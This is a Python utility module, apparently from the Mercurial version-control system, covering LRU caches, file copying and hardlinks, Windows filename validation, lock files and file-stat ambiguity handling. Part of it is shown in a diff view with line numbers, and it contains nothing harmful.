    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()

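# Illustrative sketch (not part of the module): a minimal transactional
# subclass. Leaving the ``with`` block without an exception calls close();
# release() always runs afterwards, aborting anything left open. The
# ``aborted`` flag is a stand-in for real abort logic.
#
#   class demotx(transactional):
#       def __init__(self):
#           self.closed = False
#           self.aborted = False
#       def close(self):
#           self.closed = True
#       def release(self):
#           if not self.closed:
#               self.aborted = True
#   with demotx():
#       pass   # close() then release() fire automatically
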
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns.
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()

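# Illustrative sketch (not part of the module): acceptintervention() commits
# the transaction even when the body raises InterventionRequired, preserving
# state so the user can resume later. ``tr`` is assumed to be any object
# exposing the transactional close()/release() interface, and the helper
# call is hypothetical.
#
#   with acceptintervention(tr):
#       do_interruptible_work()   # hypothetical helper that may require input
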
@contextlib.contextmanager
def nullcontextmanager():
    yield

class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset

class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self.capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self, capacity=None):
        """Create a new cache as a copy of the current one.

        By default, the new cache has the same capacity as the existing one.
        But, the cache capacity can be changed as part of performing the
        copy.

        Items in the copy have an insertion/access order matching this
        instance.
        """

        capacity = capacity or self.capacity
        result = lrucachedict(capacity)

        # We copy entries by iterating in oldest-to-newest order so the copy
        # has the correct ordering.

        # Find the first non-empty entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # We could potentially skip the first N items when decreasing capacity.
        # But let's keep it simple unless it is a performance problem.
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev

        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

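# Illustrative sketch (not part of the module): exercising lrucachedict,
# including the copy(capacity=...) form introduced by this change. The
# concrete keys are assumptions for the example.
#
#   d = lrucachedict(4)
#   for k in (b'a', b'b', b'c', b'd'):
#       d[k] = k
#   d[b'a']                      # touch 'a'; 'b' is now the oldest entry
#   d[b'e'] = b'e'               # at capacity, so 'b' is evicted
#   assert b'b' not in d
#
#   small = d.copy(capacity=2)   # shrink while copying
#   assert len(small) == 2       # only the two newest entries survive
#   assert b'e' in small and b'a' in small
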
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f

1431
1419 class propertycache(object):
1432 class propertycache(object):
1420 def __init__(self, func):
1433 def __init__(self, func):
1421 self.func = func
1434 self.func = func
1422 self.name = func.__name__
1435 self.name = func.__name__
1423 def __get__(self, obj, type=None):
1436 def __get__(self, obj, type=None):
1424 result = self.func(obj)
1437 result = self.func(obj)
1425 self.cachevalue(obj, result)
1438 self.cachevalue(obj, result)
1426 return result
1439 return result
1427
1440
1428 def cachevalue(self, obj, value):
1441 def cachevalue(self, obj, value):
1429 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1442 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1430 obj.__dict__[self.name] = value
1443 obj.__dict__[self.name] = value
1431
1444
1432 def clearcachedproperty(obj, prop):
1445 def clearcachedproperty(obj, prop):
1433 '''clear a cached property value, if one has been set'''
1446 '''clear a cached property value, if one has been set'''
1434 if prop in obj.__dict__:
1447 if prop in obj.__dict__:
1435 del obj.__dict__[prop]
1448 del obj.__dict__[prop]
1436
1449
1437 def increasingchunks(source, min=1024, max=65536):
1450 def increasingchunks(source, min=1024, max=65536):
1438 '''return no less than min bytes per chunk while data remains,
1451 '''return no less than min bytes per chunk while data remains,
1439 doubling min after each chunk until it reaches max'''
1452 doubling min after each chunk until it reaches max'''
1440 def log2(x):
1453 def log2(x):
1441 if not x:
1454 if not x:
1442 return 0
1455 return 0
1443 i = 0
1456 i = 0
1444 while x:
1457 while x:
1445 x >>= 1
1458 x >>= 1
1446 i += 1
1459 i += 1
1447 return i - 1
1460 return i - 1
1448
1461
1449 buf = []
1462 buf = []
1450 blen = 0
1463 blen = 0
1451 for chunk in source:
1464 for chunk in source:
1452 buf.append(chunk)
1465 buf.append(chunk)
1453 blen += len(chunk)
1466 blen += len(chunk)
1454 if blen >= min:
1467 if blen >= min:
1455 if min < max:
1468 if min < max:
1456 min = min << 1
1469 min = min << 1
1457 nmin = 1 << log2(blen)
1470 nmin = 1 << log2(blen)
1458 if nmin > min:
1471 if nmin > min:
1459 min = nmin
1472 min = nmin
1460 if min > max:
1473 if min > max:
1461 min = max
1474 min = max
1462 yield ''.join(buf)
1475 yield ''.join(buf)
1463 blen = 0
1476 blen = 0
1464 buf = []
1477 buf = []
1465 if buf:
1478 if buf:
1466 yield ''.join(buf)
1479 yield ''.join(buf)
1467
1480
1468 def always(fn):
1481 def always(fn):
1469 return True
1482 return True
1470
1483
1471 def never(fn):
1484 def never(fn):
1472 return False
1485 return False
1473
1486
1474 def nogc(func):
1487 def nogc(func):
1475 """disable garbage collector
1488 """disable garbage collector
1476
1489
1477 Python's garbage collector triggers a GC each time a certain number of
1490 Python's garbage collector triggers a GC each time a certain number of
1478 container objects (the number being defined by gc.get_threshold()) are
1491 container objects (the number being defined by gc.get_threshold()) are
1479 allocated even when marked not to be tracked by the collector. Tracking has
1492 allocated even when marked not to be tracked by the collector. Tracking has
1480 no effect on when GCs are triggered, only on what objects the GC looks
1493 no effect on when GCs are triggered, only on what objects the GC looks
1481 into. As a workaround, disable GC while building complex (huge)
1494 into. As a workaround, disable GC while building complex (huge)
1482 containers.
1495 containers.
1483
1496
1484 This garbage collector issue have been fixed in 2.7. But it still affect
1497 This garbage collector issue have been fixed in 2.7. But it still affect
1485 CPython's performance.
1498 CPython's performance.
1486 """
1499 """
1487 def wrapper(*args, **kwargs):
1500 def wrapper(*args, **kwargs):
1488 gcenabled = gc.isenabled()
1501 gcenabled = gc.isenabled()
1489 gc.disable()
1502 gc.disable()
1490 try:
1503 try:
1491 return func(*args, **kwargs)
1504 return func(*args, **kwargs)
1492 finally:
1505 finally:
1493 if gcenabled:
1506 if gcenabled:
1494 gc.enable()
1507 gc.enable()
1495 return wrapper
1508 return wrapper
1496
1509
1497 if pycompat.ispypy:
1510 if pycompat.ispypy:
1498 # PyPy runs slower with gc disabled
1511 # PyPy runs slower with gc disabled
1499 nogc = lambda x: x
1512 nogc = lambda x: x
1500
1513
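# Illustrative sketch (not part of the module): decorating a builder of a
# large container with @nogc suspends collection for the duration of the
# call and restores the previous GC state afterwards.
#
#   @nogc
#   def buildindex(entries):
#       return {e: [e] for e in entries}   # allocates many tracked containers
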
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it is assumed to be
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

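# Illustrative sketch (not part of the module): on a POSIX system, where
# os.sep is '/', pathto() walks up from n1 just far enough to reach n2.
# The paths are assumptions for the example.
#
#   pathto(b'/repo', b'a/b', b'a/c/d')   # -> '../c/d'
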
# the location of data files matching the source code
if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check

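# Illustrative sketch (not part of the module): checksignature() converts a
# TypeError raised by the call itself (wrong arity) into SignatureError,
# while TypeErrors raised deeper inside the function still propagate.
#
#   f = checksignature(lambda a, b: a + b)
#   f(1, 2)        # fine
#   f(1)           # raises error.SignatureError instead of a bare TypeError
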
# a whitelist of known filesystems where hardlinks work reliably
_hardlinkfswhitelist = {
    'apfs',
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (
                            oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(str(inst))

def copyfiles(src, dst, hardlink=None, progress=None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    def settopic():
        if progress:
            progress.topic = _('linking') if hardlink else _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        if progress:
            progress.increment()

    return hardlink, num

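# Illustrative sketch (not part of the module): copyfiles() probes whether
# source and destination live on the same device and hardlinks when it can,
# falling back to real copies otherwise. The paths are assumptions for the
# example.
#
#   hardlinked, n = copyfiles(b'/repo/.hg/store', b'/clone/.hg/store')
#   # 'hardlinked' reports whether hardlinks were still in use at the end
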
_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    timer = time.perf_counter

def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)

def readlock(pathname):
    try:
        return os.readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname, 'rb')
    r = fp.read()
    fp.close()
    return r

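# Illustrative sketch (not part of the module): makelock()/readlock() form a
# pair. On platforms with symlinks the lock content travels in the link
# target; elsewhere they fall back to an exclusively created regular file.
# The path and payload below are assumptions for the example.
#
#   makelock(b'hostname:1234', b'.hg/wlock')
#   assert readlock(b'.hg/wlock') == b'hostname:1234'
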
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)

# File system features

def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True

try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()

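# Illustrative sketch (not part of the module): callers use the shared
# ``re`` instance like the stdlib module; re2 is picked transparently when
# it is installed and the pattern/flags allow it.
#
#   pat = re.compile(br'bookmarks?')
#   assert pat.search(b'my bookmark') is not None
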
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patch of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)

def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass

def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative to a simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp

1961 class filestat(object):
1974 class filestat(object):
1962 """help to exactly detect change of a file
1975 """help to exactly detect change of a file
1963
1976
1964 'stat' attribute is result of 'os.stat()' if specified 'path'
1977 'stat' attribute is result of 'os.stat()' if specified 'path'
1965 exists. Otherwise, it is None. This can avoid preparative
1978 exists. Otherwise, it is None. This can avoid preparative
1966 'exists()' examination on client side of this class.
1979 'exists()' examination on client side of this class.
1967 """
1980 """
1968 def __init__(self, stat):
1981 def __init__(self, stat):
1969 self.stat = stat
1982 self.stat = stat
1970
1983
1971 @classmethod
1984 @classmethod
1972 def frompath(cls, path):
1985 def frompath(cls, path):
1973 try:
1986 try:
1974 stat = os.stat(path)
1987 stat = os.stat(path)
1975 except OSError as err:
1988 except OSError as err:
1976 if err.errno != errno.ENOENT:
1989 if err.errno != errno.ENOENT:
1977 raise
1990 raise
1978 stat = None
1991 stat = None
1979 return cls(stat)
1992 return cls(stat)
1980
1993
1981 @classmethod
1994 @classmethod
1982 def fromfp(cls, fp):
1995 def fromfp(cls, fp):
1983 stat = os.fstat(fp.fileno())
1996 stat = os.fstat(fp.fileno())
1984 return cls(stat)
1997 return cls(stat)
1985
1998
1986 __hash__ = object.__hash__
1999 __hash__ = object.__hash__
1987
2000
1988 def __eq__(self, old):
2001 def __eq__(self, old):
1989 try:
2002 try:
1990 # if ambiguity between stat of new and old file is
2003 # if ambiguity between stat of new and old file is
1991 # avoided, comparison of size, ctime and mtime is enough
2004 # avoided, comparison of size, ctime and mtime is enough
1992 # to exactly detect change of a file regardless of platform
2005 # to exactly detect change of a file regardless of platform
1993 return (self.stat.st_size == old.stat.st_size and
2006 return (self.stat.st_size == old.stat.st_size and
1994 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2007 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1995 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2008 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1996 except AttributeError:
2009 except AttributeError:
1997 pass
2010 pass
1998 try:
2011 try:
1999 return self.stat is None and old.stat is None
2012 return self.stat is None and old.stat is None
2000 except AttributeError:
2013 except AttributeError:
2001 return False
2014 return False
2002
2015
2003 def isambig(self, old):
2016 def isambig(self, old):
2004 """Examine whether new (= self) stat is ambiguous against old one
2017 """Examine whether new (= self) stat is ambiguous against old one
2005
2018
2006 "S[N]" below means stat of a file at N-th change:
2019 "S[N]" below means stat of a file at N-th change:
2007
2020
2008 - S[n-1].ctime < S[n].ctime: can detect change of a file
2021 - S[n-1].ctime < S[n].ctime: can detect change of a file
2009 - S[n-1].ctime == S[n].ctime
2022 - S[n-1].ctime == S[n].ctime
2010 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2023 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2011 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2024 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2012 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2025 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2013 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2026 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2014
2027
2015 Case (*2) above means that a file was changed twice or more at
2028 Case (*2) above means that a file was changed twice or more at
2016 the same second (= S[n-1].ctime), and comparison of the timestamps
2029 the same second (= S[n-1].ctime), and comparison of the timestamps
2017 is ambiguous.
2030 is ambiguous.
2018
2031
2019 The basic idea for avoiding such ambiguity is "advance mtime by 1
2032 The basic idea for avoiding such ambiguity is "advance mtime by 1
2020 sec, if the timestamp is ambiguous".
2033 sec, if the timestamp is ambiguous".
2021
2034
2022 But advancing mtime only in case (*2) doesn't work as
2035 But advancing mtime only in case (*2) doesn't work as
2023 expected, because naturally advanced S[n].mtime in case (*1)
2036 expected, because naturally advanced S[n].mtime in case (*1)
2024 might be equal to manually advanced S[n-1 or earlier].mtime.
2037 might be equal to manually advanced S[n-1 or earlier].mtime.
2025
2038
2026 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2039 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2027 treated as ambiguous regardless of mtime, to avoid overlooking
2040 treated as ambiguous regardless of mtime, to avoid overlooking
2028 changes due to collisions between such mtimes.
2041 changes due to collisions between such mtimes.
2029
2042
2030 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2043 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2031 S[n].mtime", even if size of a file isn't changed.
2044 S[n].mtime", even if size of a file isn't changed.
2032 """
2045 """
2033 try:
2046 try:
2034 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2047 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2035 except AttributeError:
2048 except AttributeError:
2036 return False
2049 return False
2037
2050
2038 def avoidambig(self, path, old):
2051 def avoidambig(self, path, old):
2039 """Change file stat of specified path to avoid ambiguity
2052 """Change file stat of specified path to avoid ambiguity
2040
2053
2041 'old' should be previous filestat of 'path'.
2054 'old' should be previous filestat of 'path'.
2042
2055
2043 This skips avoiding ambiguity if the process doesn't have
2056 This skips avoiding ambiguity if the process doesn't have
2044 appropriate privileges for 'path', and returns False in that
2057 appropriate privileges for 'path', and returns False in that
2045 case.
2058 case.
2046
2059
2047 Otherwise, this returns True, as "ambiguity is avoided".
2060 Otherwise, this returns True, as "ambiguity is avoided".
2048 """
2061 """
2049 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2062 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2050 try:
2063 try:
2051 os.utime(path, (advanced, advanced))
2064 os.utime(path, (advanced, advanced))
2052 except OSError as inst:
2065 except OSError as inst:
2053 if inst.errno == errno.EPERM:
2066 if inst.errno == errno.EPERM:
2054 # utime() on the file created by another user causes EPERM,
2067 # utime() on the file created by another user causes EPERM,
2055 # if a process doesn't have appropriate privileges
2068 # if a process doesn't have appropriate privileges
2056 return False
2069 return False
2057 raise
2070 raise
2058 return True
2071 return True
2059
2072
2060 def __ne__(self, other):
2073 def __ne__(self, other):
2061 return not self == other
2074 return not self == other
2062
2075
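# Illustrative sketch (not part of the original module): how a caller can
# use filestat to handle the mtime ambiguity described above. The file
# name 'somefile' is hypothetical.
#
#     oldstat = filestat.frompath('somefile')
#     ...  # rewrite 'somefile' within the same second
#     newstat = filestat.frompath('somefile')
#     if newstat.isambig(oldstat):
#         # ctimes collide; bump mtime so later comparisons can tell
#         # the two versions apart
#         newstat.avoidambig('somefile', oldstat)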
2063 class atomictempfile(object):
2076 class atomictempfile(object):
2064 '''writable file object that atomically updates a file
2077 '''writable file object that atomically updates a file
2065
2078
2066 All writes will go to a temporary copy of the original file. Call
2079 All writes will go to a temporary copy of the original file. Call
2067 close() when you are done writing, and atomictempfile will rename
2080 close() when you are done writing, and atomictempfile will rename
2068 the temporary copy to the original name, making the changes
